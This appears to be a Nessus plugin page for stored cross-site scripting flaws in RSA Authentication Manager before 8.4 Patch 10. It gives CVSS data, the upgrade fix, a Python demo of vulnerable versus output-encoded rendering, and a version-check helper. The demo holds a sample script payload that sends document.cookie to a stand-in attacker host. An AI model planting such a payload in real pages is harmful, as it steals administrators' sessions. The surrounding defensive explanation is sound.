EMC RSA Authentication Manager < 8.4 P10 Multiple Vulnerabilities (DSA-2020-052)

Low Nessus Plugin ID 135179

Synopsis

An application running on the remote host is affected by multiple stored cross-site scripting (XSS) vulnerabilities.

Description

The version of EMC RSA Authentication Manager running on the remote host is prior to 8.4 Patch 10. It is, therefore, affected by multiple vulnerabilities:

- A stored cross-site scripting (XSS) vulnerability exists in the Security Console because user-supplied input is not properly validated or encoded before it is returned to users. An authenticated, remote attacker can exploit this to store malicious script in a Security Console report; the script then executes in the browser of any other Security Console administrator who opens that report page. (CVE-2020-5339)

- A stored cross-site scripting (XSS) vulnerability exists in the Security Console because user-supplied input is not properly validated or encoded before it is returned to users. An authenticated, remote attacker can exploit this to store malicious script in the Security Console default security domain mapping; the script then executes in the browser of any other Security Console administrator who attempts to change the default security domain mapping. (CVE-2020-5340)
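Both findings follow the same stored-XSS pattern: a value that an authenticated user saves (a report name, a domain mapping) is later spliced into an administrator's page as raw markup. The following is an added illustration, not code from the Security Console or from the advisory: a toy renderer in the vulnerable form beside its output-encoded form, with constructed sample values (the report names and the attacker.invalid host are placeholders) and a small audit helper that flags which stored values survive into the page as live script.

```python
import html
import re

# Constructed sample values: what an authenticated Security Console user
# might save as a report name. The second is the shape of payload the
# advisory describes; attacker.invalid is a placeholder, not a real host.
BENIGN_NAME = "Q1 token audit"
PAYLOAD_NAME = (
    'Q1 token audit<script>fetch("https://attacker.invalid/?c="'
    "+document.cookie)</script>"
)

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_report_row_vulnerable(report_name: str) -> str:
    """Builds a report-list row by splicing the stored name into the page
    verbatim. Whatever was stored is delivered as markup to every
    administrator who opens the report page (hypothetical vulnerable form)."""
    return f"<tr><td class='report-name'>{report_name}</td></tr>"


def render_report_row_hardened(report_name: str) -> str:
    """Same row, but the stored value is entity-encoded at output time:
    '<' becomes '&lt;' and quotes become '&quot;', so the browser renders
    the payload as text rather than executing it."""
    safe = html.escape(report_name, quote=True)
    return f"<tr><td class='report-name'>{safe}</td></tr>"


def executes_script(rendered_html: str) -> bool:
    """True if a raw <script> tag is present in the rendered output."""
    return SCRIPT_TAG.search(rendered_html) is not None


def audit_renderer(render, stored_values):
    """Return the stored values that the given renderer turns into live
    markup. An empty list means output encoding held for every sample."""
    return [v for v in stored_values if executes_script(render(v))]


if __name__ == "__main__":
    samples = [BENIGN_NAME, PAYLOAD_NAME]
    print("vulnerable renderer leaks:", audit_renderer(render_report_row_vulnerable, samples))
    print("hardened renderer leaks:  ", audit_renderer(render_report_row_hardened, samples))
```

The fix is applied at output time, not on input: the same stored string may be emitted into several contexts (HTML body, attribute, script block), and each context needs its own encoder, so validating once at save time is not a substitute for encoding at the point of rendering.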

Solution

Upgrade to EMC RSA Authentication Manager version 8.4 Patch 10 or later.
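When checking installed versions against the fixed version in bulk, the patch level has to be compared numerically: as a plain string, "8.4 P9" sorts after "8.4 P10" and a patched-looking host can be marked clean. The helper below is an added example, not the plugin's own detection logic; the accepted version-string formats ("8.4", "8.4 P9", "8.4 Patch 10") are an assumption made for illustration.

```python
import re

# Fixed version per the advisory: 8.4 Patch 10, as (major, minor, patch).
FIXED_VERSION = (8, 4, 10)

# Assumed formats: "8.4", "8.4 P9", "8.4 Patch 10" (case-insensitive).
_VERSION_RE = re.compile(
    r"^\s*(\d+)\.(\d+)(?:\s*(?:P|Patch)\s*(\d+))?\s*$", re.IGNORECASE
)


def parse_version(text: str) -> tuple:
    """Parse a version string into a comparable (major, minor, patch) tuple.
    A version with no patch suffix is treated as patch 0."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_affected(text: str) -> bool:
    """True if the version is prior to 8.4 Patch 10, the plugin's condition."""
    return parse_version(text) < FIXED_VERSION


def affected_hosts(inventory: dict) -> list:
    """Given {hostname: version string}, return the hosts still needing
    the 8.4 P10 (or later) upgrade, sorted by name."""
    return sorted(h for h, v in inventory.items() if is_affected(v))


if __name__ == "__main__":
    # Constructed inventory for illustration.
    sample = {
        "am-primary": "8.4 P9",
        "am-replica-1": "8.4 Patch 10",
        "am-replica-2": "8.4",
        "am-lab": "8.5",
    }
    print("needs upgrade:", affected_hosts(sample))
```

The naive string comparison is the trap this guards against: `"8.4 P9" < "8.4 P10"` is False in Python, so a report built on string ordering would list the P9 host as already fixed.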

See Also

https://nvd.nist.gov/vuln/detail/CVE-2020-5339

http://www.nessus.org/u?e1e30067

Plugin Details

Severity: Low

ID: 135179

File Name: emc_rsa_am_8_4_p10.nasl

Version: 1.3

Type: remote

Family: CGI abuses

Published: 2020/04/02

Updated: 2020/04/24

Dependencies: 73348

Risk Information

Risk Factor: Low

CVSS Score Source: CVE-2020-5339

CVSS v2.0

Base Score: 3.5

Temporal Score: 2.6

Vector: CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N

Temporal Vector: CVSS2#E:U/RL:OF/RC:C

CVSS v3.0

Base Score: 4.8

Temporal Score: 4.2

Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

CPE: cpe:/a:emc:rsa_authentication_manager, cpe:/a:rsa:authentication_manager

Required KB Items: installed_sw/EMC RSA Authentication Manager

Exploit Ease: No known exploits are available

Patch Publication Date: 2019/02/26

Vulnerability Publication Date: 2019/02/26

Reference Information

CVE: CVE-2020-5339

BID: 107210

IAVB: 2020-B-0017-S